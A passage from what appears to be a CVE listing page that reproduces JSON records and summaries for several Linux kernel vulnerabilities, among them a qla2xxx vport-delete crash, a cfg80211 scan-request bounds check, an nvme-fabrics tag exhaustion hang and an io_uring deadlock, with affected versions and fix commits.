          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: During vport delete send async logout explicitly\n\nDuring vport delete, it is observed that during unload we hit a crash\nbecause of stale entries in outstanding command array.  For all these stale\nI/O entries, eh_abort was issued and aborted (fast_fail_io = 2009h) but\nI/Os could not complete while vport delete is in process of deleting.\n\n  BUG: kernel NULL pointer dereference, address: 000000000000001c\n  #PF: supervisor read access in kernel mode\n  #PF: error_code(0x0000) - not-present page\n  PGD 0 P4D 0\n  Oops: 0000 [#1] PREEMPT SMP NOPTI\n  Workqueue: qla2xxx_wq qla_do_work [qla2xxx]\n  RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0\n  RSP: 0018:ffffa1e1e150fc68 EFLAGS: 00010046\n  RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000001\n  RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8ce208a7a0d0\n  RBP: ffff8ce208a7a0d0 R08: 0000000000000000 R09: ffff8ce378aac9c8\n  R10: ffff8ce378aac8a0 R11: ffffa1e1e150f9d8 R12: 0000000000000000\n  R13: 0000000000000000 R14: ffff8ce378aac9c8 R15: 0000000000000000\n  FS:  0000000000000000(0000) GS:ffff8d217f000000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 000000000000001c CR3: 0000002089acc000 CR4: 0000000000350ee0\n  Call Trace:\n  \u003cTASK\u003e\n  qla2xxx_qpair_sp_free_dma+0x417/0x4e0\n  ? qla2xxx_qpair_sp_compl+0x10d/0x1a0\n  ? qla2x00_status_entry+0x768/0x2830\n  ? newidle_balance+0x2f0/0x430\n  ? dequeue_entity+0x100/0x3c0\n  ? qla24xx_process_response_queue+0x6a1/0x19e0\n  ? __schedule+0x2d5/0x1140\n  ? qla_do_work+0x47/0x60\n  ? process_one_work+0x267/0x440\n  ? process_one_work+0x440/0x440\n  ? worker_thread+0x2d/0x3d0\n  ? process_one_work+0x440/0x440\n  ? kthread+0x156/0x180\n  ? set_kthread_struct+0x50/0x50\n  ? ret_from_fork+0x22/0x30\n  \u003c/TASK\u003e\n\nSend out async logout explicitly for all the ports during vport delete."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:14.423Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/086489256696eb774654a5410e86381c346356fe"
        },
        {
          "url": "https://git.kernel.org/stable/c/171ac4b495f9473bc134356a00095b47e6409e52"
        },
        {
          "url": "https://git.kernel.org/stable/c/e5ed6a26ffdec0c91cf0b6138afbd675c00ad5fc"
        },
        {
          "url": "https://git.kernel.org/stable/c/b12c54e51ba83c1fbc619d35083d7872e42ecdef"
        },
        {
          "url": "https://git.kernel.org/stable/c/d28a2075bb530489715a3b011e1dd8765ba20313"
        },
        {
          "url": "https://git.kernel.org/stable/c/87c25fcb95aafabb6a4914239f4ab41b07a4f9b7"
        },
        {
          "url": "https://git.kernel.org/stable/c/b35d6d5a2f38605cddea7d5c64cded894fbe8ede"
        },
        {
          "url": "https://git.kernel.org/stable/c/76f480d7c717368f29a3870f7d64471ce0ff8fb2"
        }
      ],
      "title": "scsi: qla2xxx: During vport delete send async logout explicitly",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42289",
    "datePublished": "2024-08-17T09:08:59.113Z",
    "dateReserved": "2024-07-30T07:40:12.267Z",
    "dateUpdated": "2026-01-05T10:52:14.423Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41072 (GCVE-0-2024-41072)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2026-01-05 10:37

Title

wifi: cfg80211: wext: add extra SIOCSIWSCAN data check

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: wext: add extra SIOCSIWSCAN data check In 'cfg80211_wext_siwscan()', add extra check whether number of channels passed via 'ioctl(sock, SIOCSIWSCAN, ...)' doesn't exceed IW_MAX_FREQUENCIES and reject invalid request with -EINVAL otherwise.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b02ba9a0b55b762bd…
	https://git.kernel.org/stable/c/de5fcf757e33596ee…
	https://git.kernel.org/stable/c/6295bad58f988eaaf…
	https://git.kernel.org/stable/c/a43cc0558530b6c06…
	https://git.kernel.org/stable/c/001120ff0c9e3557d…
	https://git.kernel.org/stable/c/fe9644efd86704afe…
	https://git.kernel.org/stable/c/35cee10ccaee5bd45…
	https://git.kernel.org/stable/c/6ef09cdc5ba0f9382…

Impacted products

Vendor

Product

Version

Linux

Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < b02ba9a0b55b762bd04743a22f3d9f9645005e79 (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < de5fcf757e33596eed32de170ce5a93fa44dd2ac (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < 6295bad58f988eaafcf0e6f8b198a580398acb3b (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < a43cc0558530b6c065976b6b9246f512f8d3593b (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < 001120ff0c9e3557dee9b5ee0d358e0fc189996f (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < fe9644efd86704afe50e56b64b609de340ab7c95 (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < 35cee10ccaee5bd451a480521bbc25dc9f07fa5b (git)
Affected: b2e3abdc708f8c0eff194af25362fdb239abe241 , < 6ef09cdc5ba0f93826c09d810c141a8d103a80fc (git)

Linux

Affected: 2.6.32
Unaffected: 0 , < 2.6.32 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:25.315Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b02ba9a0b55b762bd04743a22f3d9f9645005e79"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de5fcf757e33596eed32de170ce5a93fa44dd2ac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6295bad58f988eaafcf0e6f8b198a580398acb3b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a43cc0558530b6c065976b6b9246f512f8d3593b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/001120ff0c9e3557dee9b5ee0d358e0fc189996f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fe9644efd86704afe50e56b64b609de340ab7c95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/35cee10ccaee5bd451a480521bbc25dc9f07fa5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6ef09cdc5ba0f93826c09d810c141a8d103a80fc"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41072",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:33.807600Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:00.660Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/scan.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b02ba9a0b55b762bd04743a22f3d9f9645005e79",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "de5fcf757e33596eed32de170ce5a93fa44dd2ac",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "6295bad58f988eaafcf0e6f8b198a580398acb3b",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "a43cc0558530b6c065976b6b9246f512f8d3593b",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "001120ff0c9e3557dee9b5ee0d358e0fc189996f",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "fe9644efd86704afe50e56b64b609de340ab7c95",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "35cee10ccaee5bd451a480521bbc25dc9f07fa5b",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            },
            {
              "lessThan": "6ef09cdc5ba0f93826c09d810c141a8d103a80fc",
              "status": "affected",
              "version": "b2e3abdc708f8c0eff194af25362fdb239abe241",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/scan.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.32"
            },
            {
              "lessThan": "2.6.32",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.32",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: wext: add extra SIOCSIWSCAN data check\n\nIn \u0027cfg80211_wext_siwscan()\u0027, add extra check whether number of\nchannels passed via \u0027ioctl(sock, SIOCSIWSCAN, ...)\u0027 doesn\u0027t exceed\nIW_MAX_FREQUENCIES and reject invalid request with -EINVAL otherwise."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:38.587Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b02ba9a0b55b762bd04743a22f3d9f9645005e79"
        },
        {
          "url": "https://git.kernel.org/stable/c/de5fcf757e33596eed32de170ce5a93fa44dd2ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/6295bad58f988eaafcf0e6f8b198a580398acb3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/a43cc0558530b6c065976b6b9246f512f8d3593b"
        },
        {
          "url": "https://git.kernel.org/stable/c/001120ff0c9e3557dee9b5ee0d358e0fc189996f"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe9644efd86704afe50e56b64b609de340ab7c95"
        },
        {
          "url": "https://git.kernel.org/stable/c/35cee10ccaee5bd451a480521bbc25dc9f07fa5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ef09cdc5ba0f93826c09d810c141a8d103a80fc"
        }
      ],
      "title": "wifi: cfg80211: wext: add extra SIOCSIWSCAN data check",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41072",
    "datePublished": "2024-07-29T14:57:32.432Z",
    "dateReserved": "2024-07-12T12:17:45.631Z",
    "dateUpdated": "2026-01-05T10:37:38.587Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41082 (GCVE-0-2024-41082)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:04 – Updated: 2026-01-05 10:37

Title

nvme-fabrics: use reserved tag for reg read/write command

Summary

In the Linux kernel, the following vulnerability has been resolved: nvme-fabrics: use reserved tag for reg read/write command In some scenarios, if too many commands are issued by nvme command in the same time by user tasks, this may exhaust all tags of admin_q. If a reset (nvme reset or IO timeout) occurs before these commands finish, reconnect routine may fail to update nvme regs due to insufficient tags, which will cause kernel hang forever. In order to workaround this issue, maybe we can let reg_read32()/reg_read64()/reg_write32() use reserved tags. This maybe safe for nvmf: 1. For the disable ctrl path, we will not issue connect command 2. For the enable ctrl / fw activate path, since connect and reg_xx() are called serially. So the reserved tags may still be enough while reg_xx() use reserved tags.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/165da9c67a26f08c9…
	https://git.kernel.org/stable/c/7dc3bfcb4c9cc5897…

Impacted products

Vendor

Product

Version

Linux

Affected: e7832cb48a654cd12b2bc9181b2f0ad49d526ac6 , < 165da9c67a26f08c9b956c15d701da7690f45bcb (git)
Affected: e7832cb48a654cd12b2bc9181b2f0ad49d526ac6 , < 7dc3bfcb4c9cc58970fff6aaa48172cb224d85aa (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:46:52.643Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/165da9c67a26f08c9b956c15d701da7690f45bcb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7dc3bfcb4c9cc58970fff6aaa48172cb224d85aa"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41082",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:02.205379Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:09.536Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/nvme/host/fabrics.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "165da9c67a26f08c9b956c15d701da7690f45bcb",
              "status": "affected",
              "version": "e7832cb48a654cd12b2bc9181b2f0ad49d526ac6",
              "versionType": "git"
            },
            {
              "lessThan": "7dc3bfcb4c9cc58970fff6aaa48172cb224d85aa",
              "status": "affected",
              "version": "e7832cb48a654cd12b2bc9181b2f0ad49d526ac6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/nvme/host/fabrics.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-fabrics: use reserved tag for reg read/write command\n\nIn some scenarios, if too many commands are issued by nvme command in\nthe same time by user tasks, this may exhaust all tags of admin_q. If\na reset (nvme reset or IO timeout) occurs before these commands finish,\nreconnect routine may fail to update nvme regs due to insufficient tags,\nwhich will cause kernel hang forever. In order to workaround this issue,\nmaybe we can let reg_read32()/reg_read64()/reg_write32() use reserved\ntags. This maybe safe for nvmf:\n\n1. For the disable ctrl path,  we will not issue connect command\n2. For the enable ctrl / fw activate path, since connect and reg_xx()\n   are called serially.\n\nSo the reserved tags may still be enough while reg_xx() use reserved tags."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:45.950Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/165da9c67a26f08c9b956c15d701da7690f45bcb"
        },
        {
          "url": "https://git.kernel.org/stable/c/7dc3bfcb4c9cc58970fff6aaa48172cb224d85aa"
        }
      ],
      "title": "nvme-fabrics: use reserved tag for reg read/write command",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41082",
    "datePublished": "2024-07-29T15:04:19.372Z",
    "dateReserved": "2024-07-12T12:17:45.633Z",
    "dateUpdated": "2026-01-05T10:37:45.950Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41080 (GCVE-0-2024-41080)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:04 – Updated: 2025-11-03 22:00

Title

io_uring: fix possible deadlock in io_register_iowq_max_workers()

Summary

In the Linux kernel, the following vulnerability has been resolved: io_uring: fix possible deadlock in io_register_iowq_max_workers() The io_register_iowq_max_workers() function calls io_put_sq_data(), which acquires the sqd->lock without releasing the uring_lock. Similar to the commit 009ad9f0c6ee ("io_uring: drop ctx->uring_lock before acquiring sqd->lock"), this can lead to a potential deadlock situation. To resolve this issue, the uring_lock is released before calling io_put_sq_data(), and then it is re-acquired after the function call. This change ensures that the locks are acquired in the correct order, preventing the possibility of a deadlock.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b17397a0a5c56e111…
	https://git.kernel.org/stable/c/97ed7ff58de66c544…
	https://git.kernel.org/stable/c/fdacd09f2ddf7a007…
	https://git.kernel.org/stable/c/950ac86cff338ab56…
	https://git.kernel.org/stable/c/b571a367502c7ef94…
	https://git.kernel.org/stable/c/73254a297c2dd094a…

Impacted products

Vendor

Product

Version

Linux

Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < b17397a0a5c56e111f61cb5b77d162664dc00de9 (git)
Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < 97ed7ff58de66c544692b3c2b988f3f594348de0 (git)
Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < fdacd09f2ddf7a00787291f08ee48c0421e5b709 (git)
Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < 950ac86cff338ab56e2eaf611f4936ee34893b63 (git)
Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < b571a367502c7ef94c688ef9c7f7d69a2ce3bcca (git)
Affected: 2b188cc1bb857a9d4701ae59aa7768b5124e262e , < 73254a297c2dd094abec7c9efee32455ae875bdf (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.10.230 , ≤ 5.10.* (semver)
Unaffected: 5.15.173 , ≤ 5.15.* (semver)
Unaffected: 6.1.118 , ≤ 6.1.* (semver)
Unaffected: 6.6.62 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:38.428Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b571a367502c7ef94c688ef9c7f7d69a2ce3bcca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73254a297c2dd094abec7c9efee32455ae875bdf"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41080",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:08.458402Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:59.495Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "io_uring/register.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b17397a0a5c56e111f61cb5b77d162664dc00de9",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            },
            {
              "lessThan": "97ed7ff58de66c544692b3c2b988f3f594348de0",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            },
            {
              "lessThan": "fdacd09f2ddf7a00787291f08ee48c0421e5b709",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            },
            {
              "lessThan": "950ac86cff338ab56e2eaf611f4936ee34893b63",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            },
            {
              "lessThan": "b571a367502c7ef94c688ef9c7f7d69a2ce3bcca",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            },
            {
              "lessThan": "73254a297c2dd094abec7c9efee32455ae875bdf",
              "status": "affected",
              "version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "io_uring/register.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.230",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.173",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.118",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.62",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.230",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.173",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.118",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.62",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
